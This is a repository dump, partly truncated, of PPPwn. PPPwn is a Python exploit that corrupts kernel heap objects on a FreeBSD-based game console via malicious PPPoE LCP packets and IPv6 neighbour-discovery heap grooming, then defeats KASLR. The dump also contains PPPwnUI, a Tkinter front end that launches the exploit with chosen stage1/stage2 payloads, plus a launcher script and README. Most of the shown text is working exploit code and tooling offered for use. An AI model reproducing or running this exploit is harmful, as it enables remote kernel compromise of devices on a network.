VM_PROT_WRITE | VM_PROT_EXECUTE) 66 | 67 | LLE_STATIC = 0x0002 68 | LLE_LINKED = 0x0040 69 | LLE_EXCLUSIVE = 0x2000 70 | 71 | LO_INITIALIZED = 0x00010000 72 | LO_WITNESS = 0x00020000 73 | LO_UPGRADABLE = 0x00200000 74 | LO_DUPOK = 0x00400000 75 | 76 | LO_CLASSSHIFT = 24 77 | 78 | RW_UNLOCKED = 1 79 | MTX_UNOWNED = 4 80 | 81 | RW_INIT_FLAGS = ((4 << LO_CLASSSHIFT) | LO_INITIALIZED | LO_WITNESS | 82 | LO_UPGRADABLE) 83 | MTX_INIT_FLAGS = ((1 << LO_CLASSSHIFT) | LO_INITIALIZED | LO_WITNESS) 84 | 85 | CALLOUT_RETURNUNLOCKED = 0x10 86 | 87 | AF_INET6 = 28 88 | 89 | IFT_ETHER = 0x6 90 | 91 | ND6_LLINFO_NOSTATE = 0xfffe 92 | 93 | # FreeBSD offsets 94 | 95 | TARGET_SIZE = 0x100 96 | 97 | PPPOE_SOFTC_SC_DEST = 0x24 98 | PPPOE_SOFTC_SC_AC_COOKIE = 0x40 99 | PPPOE_SOFTC_SIZE = 0x1c8 100 | 101 | LLTABLE_LLTIFP = 0x110 102 | LLTABLE_LLTFREE = 0x118 103 | 104 | SOCKADDR_IN6_SIZE = 0x1c 105 | 106 | 107 | def p8(val): 108 | return pack('H', val & 0xffff) 117 | 118 | 119 | def p32(val): 120 | return pack('I', val & 0xffffffff) 125 | 126 | 127 | def p64(val): 128 | return pack('Q', val & 0xffffffffffffffff) 133 | 134 | 135 | class LcpEchoHandler(AsyncSniffer): 136 | 137 | def __init__(self, iface): 138 | self.s = conf.L2socket(iface=iface) 139 | super().__init__(opened_socket=self.s, 140 | prn=self.handler, 141 | filter='pppoes && !ip', 142 | lfilter=lambda pkt: pkt.haslayer(PPP_LCP_Echo)) 143 | 144 | def handler(self, pkt): 145 | self.s.send( 146 | Ether(src=pkt[Ether].dst, dst=pkt[Ether].src, type=ETHERTYPE_PPPOE) 147 | / PPPoE(sessionid=pkt[PPPoE].sessionid) / PPP() / 148 | PPP_LCP_Echo(code=ECHO_REPLY, id=pkt[PPP_LCP_Echo].id)) 149 | 150 | 151 | class Exploit(): 152 | SPRAY_NUM = 0x1000 153 | PIN_NUM = 0x1000 154 | CORRUPT_NUM = 0x1 155 | 156 | HOLE_START = 0x400 157 | HOLE_SPACE = 0x10 158 | 159 | LCP_ID = 0x41 160 | IPCP_ID = 0x41 161 | 162 | SESSION_ID = 0xffff 163 | 164 | STAGE2_PORT = 9020 165 | 166 | SOURCE_MAC = '41:41:41:41:41:41' 167 | SOURCE_IPV4 = '41.41.41.41' 168 | SOURCE_IPV6 = 'fe80::9f9f:41ff:9f9f:41ff' 169 | 170 | TARGET_IPV4 = '42.42.42.42' 171 | 172 | BPF_FILTER = '(ip6) || (pppoed) || (pppoes && !ip)' 173 | 174 | def __init__(self, offs, iface, stage1, stage2): 175 | self.offs = offs 176 | self.iface = iface 177 | self.stage1 = stage1 178 | self.stage2 = stage2 179 | self.s = conf.L2socket(iface=self.iface, filter=self.BPF_FILTER) 180 | 181 | def kdlsym(self, addr): 182 | return self.kaslr_offset + addr 183 | 184 | def lcp_negotiation(self): 185 | print('[*] Sending LCP configure request...') 186 | self.s.send( 187 | Ether(src=self.source_mac, 188 | dst=self.target_mac, 189 | type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) / 190 | PPP() / PPP_LCP(code=CONF_REQ, id=self.LCP_ID)) 191 | 192 | print('[*] Waiting for LCP configure ACK...') 193 | while True: 194 | pkt = self.s.recv() 195 | if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[ 196 | PPP_LCP_Configure].code == CONF_ACK: 197 | break 198 | 199 | print('[*] Waiting for LCP configure request...') 200 | while True: 201 | pkt = self.s.recv() 202 | if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[ 203 | PPP_LCP_Configure].code == CONF_REQ: 204 | break 205 | 206 | print('[*] Sending LCP configure ACK...') 207 | self.s.send( 208 | Ether(src=self.source_mac, 209 | dst=self.target_mac, 210 | type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) / 211 | PPP() / PPP_LCP(code=CONF_ACK, id=pkt[PPP_LCP_Configure].id)) 212 | 213 | def ipcp_negotiation(self): 214 | print('[*] Sending IPCP configure request...') 215 | self.s.send( 216 | Ether( 217 | src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE) 218 | / PPPoE(sessionid=self.SESSION_ID) / PPP() / 219 | PPP_IPCP(code=CONF_REQ, 220 | id=self.IPCP_ID, 221 | options=PPP_IPCP_Option_IPAddress(data=self.SOURCE_IPV4))) 222 | 223 | print('[*] Waiting for IPCP configure ACK...') 224 | while True: 225 | pkt = self.s.recv() 226 | if pkt and pkt.haslayer( 227 | PPP_IPCP) and pkt[PPP_IPCP].code == CONF_ACK: 228 | break 229 | 230 | print('[*] Waiting for IPCP configure request...') 231 | while True: 232 | pkt = self.s.recv() 233 | if pkt and pkt.haslayer( 234 | PPP_IPCP) and pkt[PPP_IPCP].code == CONF_REQ: 235 | break 236 | 237 | print('[*] Sending IPCP configure NAK...') 238 | self.s.send( 239 | Ether( 240 | src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE) 241 | / PPPoE(sessionid=self.SESSION_ID) / PPP() / 242 | PPP_IPCP(code=CONF_NAK, 243 | id=pkt[PPP_IPCP].id, 244 | options=PPP_IPCP_Option_IPAddress(data=self.TARGET_IPV4))) 245 | 246 | print('[*] Waiting for IPCP configure request...') 247 | while True: 248 | pkt = self.s.recv() 249 | if pkt and pkt.haslayer( 250 | PPP_IPCP) and pkt[PPP_IPCP].code == CONF_REQ: 251 | break 252 | 253 | print('[*] Sending IPCP configure ACK...') 254 | self.s.send( 255 | Ether(src=self.source_mac, 256 | dst=self.target_mac, 257 | type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) / 258 | PPP() / PPP_IPCP(code=CONF_ACK, 259 | id=pkt[PPP_IPCP].id, 260 | options=pkt[PPP_IPCP].options)) 261 | 262 | def ppp_negotation(self, cb=None, ignore_initial_req=False): 263 | if ignore_initial_req: 264 | print('[*] Waiting for PADI...') 265 | while True: 266 | pkt = self.s.recv() 267 | if pkt and pkt.haslayer( 268 | PPPoED) and pkt[PPPoED].code == PPPOE_CODE_PADI: 269 | break 270 | 271 | print('[*] Waiting for PADI...') 272 | while True: 273 | pkt = self.s.recv() 274 | if pkt and pkt.haslayer( 275 | PPPoED) and pkt[PPPoED].code == PPPOE_CODE_PADI: 276 | break 277 | 278 | for tag in pkt[PPPoED][PPPoED_Tags].tag_list: 279 | if tag.tag_type == PPPOE_TAG_HUNIQUE: 280 | host_uniq = tag.tag_value 281 | 282 | self.pppoe_softc = unpack('= self.HOLE_START and i % self.HOLE_SPACE == 0: 653 | continue 654 | 655 | self.s.send( 656 | Ether(src=self.source_mac, dst=self.target_mac) / 657 | IPv6(src=source_ipv6, dst=self.target_ipv6) / 658 | ICMPv6ND_NA(tgt=source_ipv6, S=1) / 659 | ICMPv6NDOptDstLLAddr(lladdr=self.source_mac)) 660 | 661 | print('[+] Heap grooming...done') 662 | 663 | print('') 664 | print('[+] STAGE 1: Memory corruption') 665 | 666 | # Send invalid packet to trigger a printf in the kernel. For some 667 | # reason, this causes scheduling on CPU 0 at some point, which makes 668 | # the next allocation use the same per-CPU cache. 669 | for i in range(self.PIN_NUM): 670 | if i % 0x100 == 0: 671 | print('[*] Pinning to CPU 0...{}%'.format(100 * i // 672 | self.PIN_NUM), 673 | end='\r', 674 | flush=True) 675 | 676 | self.s.send( 677 | Ether(src=self.source_mac, 678 | dst=self.target_mac, 679 | type=ETHERTYPE_PPPOE)) 680 | sleep(0.001) 681 | 682 | print('[+] Pinning to CPU 0...done') 683 | 684 | # LCP fails sometimes without the wait 685 | sleep(1) 686 | 687 | # Corrupt in6_llentry object 688 | overflow_lle = self.build_overflow_lle() 689 | print('[*] Sending malicious LCP configure request...') 690 | for i in range(self.CORRUPT_NUM): 691 | self.s.send( 692 | Ether(src=self.source_mac, 693 | dst=self.target_mac, 694 | type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) / 695 | PPP() / PPP_LCP(code=CONF_REQ, 696 | id=self.LCP_ID, 697 | len=TARGET_SIZE + 4, 698 | data=(PPP_LCP_Option(data=b'A' * 699 | (TARGET_SIZE - 4)) / 700 | PPP_LCP_Option(data=overflow_lle)))) 701 | 702 | print('[*] Waiting for LCP configure reject...') 703 | while True: 704 | pkt = self.s.recv() 705 | if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[ 706 | PPP_LCP_Configure].code == CONF_REJ: 707 | break 708 | 709 | # Re-negotiate after rejection 710 | self.lcp_negotiation() 711 | self.ipcp_negotiation() 712 | 713 | corrupted = False 714 | for i in reversed(range(self.SPRAY_NUM)): 715 | if i % 0x100 == 0: 716 | print('[*] Scanning for corrupted object...{}'.format(hex(i)), 717 | end='\r', 718 | flush=True) 719 | 720 | if i >= self.HOLE_START and i % self.HOLE_SPACE == 0: 721 | continue 722 | 723 | source_ipv6 = 'fe80::{:04x}:41ff:9f9f:41ff'.format(i) 724 | 725 | self.s.send( 726 | Ether(src=self.source_mac, dst=self.target_mac) / 727 | IPv6(src=source_ipv6, dst=self.target_ipv6) / 728 | ICMPv6EchoRequest()) 729 | 730 | while True: 731 | pkt = self.s.recv() 732 | if pkt: 733 | if pkt.haslayer(ICMPv6EchoReply): 734 | break 735 | elif pkt.haslayer(ICMPv6ND_NS): 736 | corrupted = True 737 | break 738 | 739 | if corrupted: 740 | break 741 | 742 | self.s.send( 743 | Ether(src=self.source_mac, dst=self.target_mac) / 744 | IPv6(src=source_ipv6, dst=self.target_ipv6) / 745 | ICMPv6ND_NA(tgt=source_ipv6, S=1) / 746 | ICMPv6NDOptDstLLAddr(lladdr=self.source_mac)) 747 | 748 | if not corrupted: 749 | print('[-] Scanning for corrupted object...failed. Please retry.') 750 | exit(1) 751 | 752 | print( 753 | '[+] Scanning for corrupted object...found {}'.format(source_ipv6)) 754 | 755 | print('') 756 | print('[+] STAGE 2: KASLR defeat') 757 | 758 | print('[*] Defeating KASLR...') 759 | while True: 760 | pkt = self.s.recv() 761 | if pkt and pkt.haslayer( 762 | ICMPv6NDOptSrcLLAddr) and pkt[ICMPv6NDOptSrcLLAddr].len > 1: 763 | break 764 | 765 | self.pppoe_softc_list = unpack('', self.button_click) 63 | 64 | self.file_menu = tk.Menu(self.menu, tearoff=0) 65 | self.menu.add_cascade(label="File", menu=self.file_menu) 66 | self.file_menu.add_command(label="Exit", command=master.quit) 67 | 68 | self.exploit_menu = tk.Menu(self.menu, tearoff=0) 69 | self.menu.add_cascade(label="PPPwn", menu=self.exploit_menu) 70 | self.exploit_menu.add_command(label=" Start PPPwn > ", command=self.start_pppwn) 71 | 72 | self.help_menu = tk.Menu(self.menu, tearoff=0) 73 | self.menu.add_cascade(label="Help", menu=self.help_menu) 74 | self.help_menu.add_command(label="About", command=self.about) 75 | 76 | # Menu déroulant pour les interfaces réseau 77 | self.interface_var = tk.StringVar(master) 78 | if sys.platform == "linux": 79 | self.interface_var.set("Select an interface :") # Réseau pré-sélectionné 80 | else: 81 | self.interface_var.set("Ethernet") # .set("Select an interface :") # Réseau pré-sélectionné 82 | self.interface_menu = tk.OptionMenu(master, self.interface_var, *get_network_interface_names()) 83 | self.interface_menu.pack() 84 | 85 | # Frame pour les boutons radio "PPPwn" et "PPPwn Goldhen" 86 | self.radio_frame = tk.Frame(master) 87 | self.radio_frame.pack() 88 | 89 | # Variables pour les boutons radio PPPwn et PPPwn Goldhen 90 | self.radio_var = tk.StringVar(master, value="PPPwn Goldhen") 91 | 92 | # Création des boutons radio pour PPPwn et PPPwn Goldhen 93 | self.pppwn_radio_button = tk.Radiobutton(self.radio_frame, text="PPPwn", variable=self.radio_var, value="PPPwn", command=self.update_firmware_options) 94 | self.pppwn_radio_button.pack(side=tk.LEFT, padx=5) 95 | 96 | self.goldhen_radio_button = tk.Radiobutton(self.radio_frame, text="PPPwn Goldhen", variable=self.radio_var, value="PPPwn Goldhen", command=self.update_firmware_options) 97 | self.goldhen_radio_button.pack(side=tk.LEFT, padx=5) 98 | 99 | self.hen_radio_button = tk.Radiobutton(self.radio_frame, text="HEN", variable=self.radio_var, value="HEN", command=self.update_firmware_options) 100 | self.hen_radio_button.pack(side=tk.LEFT, padx=5) 101 | 102 | self.linux_radio_button = tk.Radiobutton(self.radio_frame, text="Linux", variable=self.radio_var, value="Linux", command=self.update_firmware_options) 103 | self.linux_radio_button.pack(side=tk.LEFT, padx=5) 104 | 105 | self.custom_radio_button = tk.Radiobutton(self.radio_frame, text=CUSTOM, variable=self.radio_var, value=CUSTOM, command=self.update_firmware_options) 106 | self.custom_radio_button.pack(side=tk.LEFT, padx=5) 107 | 108 | # Frame pour les versions d'exploit 109 | self.exploit_frame = tk.Frame(master) 110 | self.exploit_frame.pack(pady=10) 111 | 112 | # Variable pour les versions d'exploit 113 | self.exploit_var = tk.StringVar(master, value="PPPwn Python") 114 | 115 | # Création des boutons radio pour les versions d'exploit 116 | self.pppwn_python_radio_button = tk.Radiobutton(self.exploit_frame, text="PPPwn Python", variable=self.exploit_var, value="PPPwn Python") 117 | self.pppwn_python_radio_button.pack(side=tk.LEFT, padx=5) 118 | 119 | # self.pppwn_cpp_radio_button = tk.Radiobutton(self.exploit_frame, text="PPPwn C++", variable=self.exploit_var, value="PPPwn C++") 120 | # self.pppwn_cpp_radio_button.pack(side=tk.LEFT, padx=5) 121 | 122 | self.pppwn_go_radio_button = tk.Radiobutton(self.exploit_frame, text="PPPwn_GO", variable=self.exploit_var, value="PPPwn_GO") 123 | self.pppwn_go_radio_button.pack(side=tk.LEFT, padx=5) 124 | 125 | # Conteneur pour les colonnes des firmwares 126 | self.firmware_label = tk.Label(master, text="Choose your Payload:") 127 | self.firmware_label.pack() 128 | self.columns_container = tk.Frame(master) 129 | self.columns_container.pack() 130 | 131 | self.selected_fw1 = "11.00" 132 | self.selected_fw2 = GOLDHEN_1100 133 | self.selected_fw3 = VTX_1100 134 | 135 | # Firmwares avec noms des versions 136 | self.firmware_var = tk.StringVar(master) 137 | self.firmware_var.set(self.selected_fw1) # Firmware pré-sélectionné 138 | 139 | # Sélection payloads 140 | self.payload_frame = tk.Frame(master) 141 | 142 | self.payload_label = tk.Label(self.payload_frame, text="Select Payloads:") 143 | self.payload_label.pack() 144 | 145 | self.payload_var = tk.StringVar(master) 146 | 147 | self.custom_payloads_frame = tk.Frame(master) 148 | 149 | self.stage1_label = tk.Label(self.custom_payloads_frame, text="Custom Stage 1:") 150 | self.stage1_label.grid(row=0, column=0) 151 | 152 | self.stage1_path = tk.StringVar() 153 | self.stage1_entry = tk.Entry(self.custom_payloads_frame, textvariable=self.stage1_path, width=30) 154 | self.stage1_entry.grid(row=0, column=1) 155 | 156 | self.stage1_browse_button = tk.Button(self.custom_payloads_frame, text="Browse", command=self.select_stage1_file) 157 | self.stage1_browse_button.grid(row=0, column=2, padx=5) 158 | 159 | self.stage2_label = tk.Label(self.custom_payloads_frame, text="Custom Stage 2:") 160 | self.stage2_label.grid(row=1, column=0) 161 | 162 | self.stage2_path = tk.StringVar() 163 | self.stage2_entry = tk.Entry(self.custom_payloads_frame, textvariable=self.stage2_path, width=30) 164 | self.stage2_entry.grid(row=1, column=1) 165 | 166 | self.stage2_browse_button = tk.Button(self.custom_payloads_frame, text="Browse", command=self.select_stage2_file) 167 | self.stage2_browse_button.grid(row=1, column=2, padx=5) 168 | 169 | # Start PPPwn 170 | self.start_button = tk.Button(master, text=" Start PPPwn > ", bg='white',fg='blue', font = ('Sans','10','bold'), command=self.start_pppwn) 171 | self.start_button.pack(side=tk.BOTTOM, pady=10) 172 | self.start_button.focus() 173 | 174 | self.read_last_options() 175 | self.update_firmware_options() # Mettre à jour les options de firmware initiales 176 | 177 | def update_firmware_options(self): 178 | # Supprimer les boutons radio actuels 179 | for widget in self.columns_container.winfo_children(): 180 | widget.destroy() 181 | 182 | # Mettre à jour les options de firmware en fonction de la sélection de l'utilisateur 183 | firmware_versions = self.get_firmware_options() 184 | 185 | if self.firmware_var.get() == GOLDHEN_900: 186 | self.selected_fw2 = self.firmware_var.get() 187 | elif self.firmware_var.get() == GOLDHEN_1000: 188 | self.selected_fw2 = self.firmware_var.get() 189 | elif self.firmware_var.get() == GOLDHEN_1001: 190 | self.selected_fw2 = self.firmware_var.get() 191 | elif self.firmware_var.get() == GOLDHEN_1100: 192 | self.selected_fw2 = self.firmware_var.get() 193 | elif self.firmware_var.get() != CUSTOM: 194 | self.selected_fw1 = self.firmware_var.get() 195 | 196 | # Créer les colonnes des boutons radio avec les nouvelles options de firmware 197 | if self.radio_var.get() == CUSTOM: 198 | num_columns = 2 199 | self.firmware_var.set(CUSTOM) 200 | self.custom_payloads_frame.pack() 201 | elif self.radio_var.get() == "HEN": 202 | num_columns = 2 203 | self.firmware_var.set(VTX_1100) 204 | self.custom_payloads_frame.pack_forget() 205 | elif self.radio_var.get() == "Linux": 206 | num_columns = 1 207 | self.firmware_var.set(LINUX_1GB) 208 | self.custom_payloads_frame.pack_forget() 209 | else: 210 | self.custom_payloads_frame.pack_forget() 211 | if self.radio_var.get() == "PPPwn": 212 | num_columns = 3 213 | self.firmware_var.set(i1_00) 214 | else: 215 | num_columns = 1 216 | self.firmware_var.set(GOLDHEN_1100) 217 | 218 | column_widgets = [] 219 | if self.radio_var.get() == CUSTOM: 220 | no_label = tk.Label(self.columns_container, text="") 221 | column_widgets.append(no_label) 222 | else: 223 | for firmware in firmware_versions: 224 | radio_button = tk.Radiobutton(self.columns_container, text=firmware, variable=self.firmware_var, value=firmware, command=self.show_payload_options) 225 | column_widgets.append(radio_button) 226 | 227 | for i, widget in enumerate(column_widgets): 228 | column_index = i % num_columns 229 | row_index = i // num_columns 230 | widget.grid(row=row_index, column=column_index, sticky="w") 231 | 232 | self.show_payload_options 233 | 234 | def get_firmware_options(self): 235 | if self.radio_var.get() == "PPPwn": 236 | # Options de firmware pour PPPwn 237 | return ["7.00", "7.01", "7.02", "7.50", "7.51", "7.55", 238 | "8.00", "8.01", "8.03", "8.50", "8.52", 239 | "9.00", "9.03", "9.04", "9.50", "9.51", "9.60", 240 | "10.00", "10.01", "10.50", "10.70", "10.71", "11.00"] 241 | elif self.radio_var.get() == "PPPwn Goldhen": 242 | # Options de firmware pour PPPwn Goldhen 243 | return [GOLDHEN_900, GOLDHEN_960, GOLDHEN_1000, 244 | GOLDHEN_1001, GOLDHEN_1100] 245 | elif self.radio_var.get() == "HEN": 246 | return [VTX_755, VTX_800, VTX_803, VTX_850, VTX_852, VTX_900, VTX_903, VTX_904, VTX_1000, VTX_1001, VTX_1050, VTX_1070, VTX_1071, VTX_1100] 247 | elif self.radio_var.get() == "Linux": 248 | return [LINUX_1GB, LINUX_2GB, LINUX_3GB, LINUX_4GB] 249 | elif self.radio_var.get() == CUSTOM: 250 | # Options de firmware pour PPPwn Goldhen 251 | return [CUSTOM] 252 | 253 | def show_payload_options(self): 254 | if self.firmware_var.get() == CUSTOM: 255 | self.payload_frame.pack() 256 | self.custom_payloads_frame.pack() 257 | else: 258 | self.payload_frame.pack_forget() 259 | self.custom_payloads_frame.pack_forget() 260 | 261 | def select_stage1_file(self): 262 | stage1_file = filedialog.askopenfilename() 263 | self.stage1_path.set(stage1_file) 264 | 265 | def select_stage2_file(self): 266 | stage2_file = filedialog.askopenfilename() 267 | self.stage2_path.set(stage2_file) 268 | 269 | def read_line(self, f): 270 | return f.readline().replace('\n','') 271 | 272 | def read_last_options(self): 273 | if os.path.isfile("PPPwnUI.ini"): 274 | f = open("PPPwnUI.ini", "r") 275 | self.interface_var.set(self.read_line(f)) 276 | self.exploit_var.set(self.read_line(f)) 277 | self.radio_var.set(self.read_line(f)) 278 | self.selected_fw1 = self.read_line(f) 279 | self.selected_fw2 = self.read_line(f) 280 | self.stage1_path.set(self.read_line(f)) 281 | self.stage2_path.set(self.read_line(f)) 282 | self.firmware_var.set(self.read_line(f)) 283 | f.close() 284 | 285 | def save_last_options(self, interface, firmware, exploit_version): 286 | f = open("PPPwnUI.ini", "w") 287 | f.write(interface + '\n') 288 | f.write(exploit_version + '\n') 289 | f.write(self.radio_var.get() + '\n') 290 | f.write(self.selected_fw1 + '\n') 291 | f.write(self.selected_fw2 + '\n') 292 | f.write(self.stage1_path.get() + '\n') 293 | f.write(self.stage2_path.get() + '\n') 294 | f.write(firmware + '\n') 295 | f.close() 296 | 297 | def button_click(self, event): 298 | self.start_pppwn() 299 | 300 | def start_pppwn(self): 301 | interface = self.interface_var.get() 302 | firmware = self.firmware_var.get() 303 | exploit_version = self.exploit_var.get() 304 | 305 | stage1_path = self.stage1_path.get() 306 | stage2_path = self.stage2_path.get() 307 | 308 | if interface == "Select an interface :": 309 | messagebox.showerror("Error", "Select a network interface") 310 | return 311 | 312 | self.save_last_options(interface, firmware, exploit_version) 313 | 314 | if firmware == CUSTOM: 315 | firmware_value = self.selected_fw1.replace(".", "") 316 | if not os.path.isfile(stage1_path): 317 | messagebox.showerror("Error", "Stage1 does not exist") 318 | return 319 | if not os.path.isfile(stage2_path): 320 | messagebox.showerror("Error", "Stage2 does not exist") 321 | return 322 | if exploit_version == "PPPwn Python": 323 | if sys.platform == "linux": 324 | command = f'python3 PPPwn/pppwn.py --interface="{interface}" --stage1="{stage1_path}" --stage2="{stage2_path}"' 325 | else: 326 | command = f'python PPPwn/pppwn.py --interface="{interface}" --stage1="{stage1_path}" --stage2="{stage2_path}"' 327 | elif exploit_version == "PPPwn C++": 328 | if sys.platform == "linux": 329 | command = f'./PPPwn/pppwn_cpp --interface="{interface}" --stage1="{stage1_path}" --stage2="{stage2_path}"' 330 | else: 331 | command = f'PPPwn\\pppwn_cpp.exe --interface="{interface}" --stage1="{stage1_path}" --stage2="{stage2_path}"' 332 | elif exploit_version == "PPPwn_GO": 333 | if sys.platform == "linux": 334 | command = f'./PPPwn/pppwn_go --stage1="{stage1_path}" --stage2="{stage2_path}"' 335 | else: 336 | command = f'PPPwn\\pppwn_go.exe --stage1="{stage1_path}" --stage2="{stage2_path}"' 337 | elif firmware.find("Goldhen for ") != -1: 338 | firmware_value = firmware.replace("Goldhen for ","").replace(".", "") 339 | if exploit_version == "PPPwn Python": 340 | if sys.platform == "linux": 341 | command = f'python3 PPPwn/pppwn.py --interface="{interface}" --stage1="PPPwn/goldhen/{firmware_value}/stage1.bin" --stage2="PPPwn/goldhen/{firmware_value}/stage2.bin"' 342 | else: 343 | command = f'python PPPwn/pppwn.py --interface="{interface}" --stage1="PPPwn/goldhen/{firmware_value}/stage1.bin" --stage2="PPPwn/goldhen/{firmware_value}/stage2.bin"' 344 | elif exploit_version == "PPPwn C++": 345 | if sys.platform == "linux": 346 | command = f'./PPPwn/pppwn_cpp --interface="{interface}" --stage1="PPPwn/goldhen/{firmware_value}/stage1.bin" --stage2="PPPwn/goldhen/{firmware_value}/stage2.bin"' 347 | else: 348 | command = f'PPPwn\\pppwn_cpp.exe --interface="{interface}" --stage1="PPPwn/goldhen/{firmware_value}/stage1.bin" --stage2="PPPwn/goldhen/{firmware_value}/stage2.bin"' 349 | elif exploit_version == "PPPwn_GO": 350 | if sys.platform == "linux": 351 | command = f'./PPPwn/pppwn_go --fw={firmware_value} --stage1="PPPwn/goldhen/{firmware_value}/stage1.bin" --stage2="PPPwn/goldhen/{firmware_value}/stage2.bin"' 352 | else: 353 | command = f'PPPwn\\pppwn_go.exe --fw={firmware_value} --stage1="PPPwn/goldhen/{firmware_value}/stage1.bin" --stage2="PPPwn/goldhen/{firmware_value}/stage2.bin"' 354 | elif firmware.find("VTX HEN for ") != -1: 355 | firmware_value = firmware.replace("VTX HEN for ","").replace(".", "") 356 | if exploit_version == "PPPwn Python": 357 | if sys.platform == "linux": 358 | command = f'python3 PPPwn/pppwn.py --interface="{interface}" --stage1="PPPwn/hen/{firmware_value}/stage1.bin" --stage2="PPPwn/hen/{firmware_value}/stage2.bin"' 359 | else: 360 | command = f'python PPPwn/pppwn.py --interface="{interface}" --stage1="PPPwn/hen/{firmware_value}/stage1.bin" --stage2="PPPwn/hen/{firmware_value}/stage2.bin"' 361 | elif exploit_version == "PPPwn C++": 362 | if sys.platform == "linux": 363 | command = f'./PPPwn/pppwn_cpp --interface="{interface}" --stage1="PPPwn/hen/{firmware_value}/stage1.bin" --stage2="PPPwn/hen/{firmware_value}/stage2.bin"' 364 | else: 365 | command = f'PPPwn\\pppwn_cpp.exe --interface="{interface}" --stage1="PPPwn/hen/{firmware_value}/stage1.bin" --stage2="PPPwn/hen/{firmware_value}/stage2.bin"' 366 | elif exploit_version == "PPPwn_GO": 367 | if sys.platform == "linux": 368 | command = f'./PPPwn/pppwn_go --fw={firmware_value} --stage1="PPPwn/hen/{firmware_value}/stage1.bin" --stage2="PPPwn/hen/{firmware_value}/stage2.bin"' 369 | else: 370 | command = f'PPPwn\\pppwn_go.exe --fw={firmware_value} --stage1="PPPwn/hen/{firmware_value}/stage1.bin" --stage2="PPPwn/hen/{firmware_value}/stage2.bin"' 371 | elif firmware.find("Linux") != -1: 372 | firmware_value = firmware.replace("Linux ", "").replace("GB", "gb").replace(" 11.00", "") 373 | stage2_file = f'PPPwn/linux/stage2-1100-{firmware_value}.bin' 374 | if exploit_version == "PPPwn Python": 375 | if sys.platform == "linux": 376 | command = f'python3 PPPwn/pppwn.py --interface="{interface}" --stage1="PPPwn/linux/stage1-1100.bin" --stage2="{stage2_file}"' 377 | else: 378 | command = f'python PPPwn/pppwn.py --interface="{interface}" --stage1="PPPwn/linux/stage1-1100.bin" --stage2="{stage2_file}"' 379 | elif exploit_version == "PPPwn C++": 380 | if sys.platform == "linux": 381 | command = f'./PPPwn/pppwn_cpp --i "{interface}" --stage1="PPPwn/linux/stage1-1100.bin" --stage2="{stage2_file}"' 382 | else: 383 | command = f'PPPwn\\pppwn_cpp.exe --i={interface} --stage1="PPPwn/linux/stage1-1100.bin" --stage2="{stage2_file}"' 384 | elif exploit_version == "PPPwn_GO": 385 | if sys.platform == "linux": 386 | command = f'./PPPwn/pppwn_go --fw=1100 --stage1="PPPwn/linux/stage1-1100.bin" --stage2="{stage2_file}"' 387 | else: 388 | command = f'PPPwn\\pppwn_go.exe --fw=1100 --stage1="PPPwn/linux/stage1-1100.bin" --stage2="{stage2_file}"' 389 | else: 390 | firmware_value = firmware.replace(".", "") 391 | if firmware_value.isdigit(): 392 | if exploit_version == "PPPwn Python": 393 | if sys.platform == "linux": 394 | command = f'python3 PPPwn/pppwn.py --interface="{interface}" --fw="{firmware_value}" --stage1="PPPwn/stage1/{firmware_value}/stage1.bin" --stage2="PPPwn/stage2/{firmware_value}/stage2.bin"' 395 | else: 396 | command = f'python PPPwn/pppwn.py --interface="{interface}" --fw="{firmware_value}" --stage1="PPPwn/stage1/{firmware_value}/stage1.bin" --stage2="PPPwn/stage2/{firmware_value}/stage2.bin"' 397 | elif exploit_version == "PPPwn C++": 398 | if sys.platform == "linux": 399 | command = f'./PPPwn/pppwn_cpp --interface="{interface}" --fw="{firmware_value} --stage1="PPPwn/stage1/{firmware_value}/stage1.bin" --stage2="PPPwn/stage2/{firmware_value}/stage2.bin"' 400 | else: 401 | command = f'PPPwn\\pppwn_cpp.exe --interface="{interface}" --fw="{firmware_value} --stage1="PPPwn/stage1/{firmware_value}/stage1.bin" --stage2="PPPwn/stage2/{firmware_value}/stage2.bin"' 402 | elif exploit_version == "PPPwn_GO": 403 | if sys.platform == "linux": 404 | command = f'./PPPwn/pppwn_go --fw={firmware_value} --stage1="PPPwn/stage1/{firmware_value}/stage1.bin" --stage2="PPPwn/stage2/{firmware_value}/stage2.bin"' 405 | else: 406 | command = f'PPPwn\\pppwn_go.exe --fw={firmware_value} --stage1=PPPwn/stage1/{firmware_value}/stage1.bin --stage2=PPPwn/stage2/{firmware_value}/stage2.bin' 407 | else: 408 | messagebox.showerror("Error", "Invalid firmware selection") 409 | return 410 | 411 | try: 412 | subprocess.Popen(command, shell=True) 413 | except subprocess.CalledProcessError as e: 414 | messagebox.showerror("Error", f"An error occurred: {e}") 415 | 416 | 417 | 418 | def about(self): 419 | messagebox.showinfo("About", "PPPwnUI v4.1\n\nDeveloped by Memz") 420 | 421 | if sys.platform == "linux" and not os.geteuid() == 0: 422 | print("You must run this program as administrator.") 423 | sys.exit(1) 424 | 425 | root = tk.Tk() 426 | app = App(root) 427 | root.mainloop() -------------------------------------------------------------------------------- /PPPwnUI.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | chmod +x ./PPPwn/pppwn_go 3 | sudo python3 PPPwnUI.py -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PPPwnUI 2 | PPPwnUI is a program made in Python that adds an UI to the exploit [PPPwn](https://github.com/TheOfficialFloW/PPPwn/) created by [TheFlow](https://github.com/TheOfficialFloW/). 3 | 4 | ## Installation : 5 | 6 | - Clone the repository: 7 | 8 | ```sh 9 | git clone https://github.com/B-Dem/PPPwnUI 10 | ``` 11 | 12 | - Install the requirements: 13 | 14 | ```sh 15 | pip install -r requirements.txt 16 | ``` 17 | 18 | ## Usage : 19 | 20 | - Launch the app with 21 | 22 | **Windows :** 23 | 24 | ```PPPwnUI.bat``` 25 | 26 | **Linux :** 27 | 28 | ```sh 29 | chmod +x PPPwnUI.sh 30 | ``` 31 | 32 | Then : 33 | 34 | ```sh 35 | ./PPPwnUI.sh 36 | ``` 37 | 38 | - Select your Interface using the drop-down menu 39 | 40 | - Choose Between the Exploit 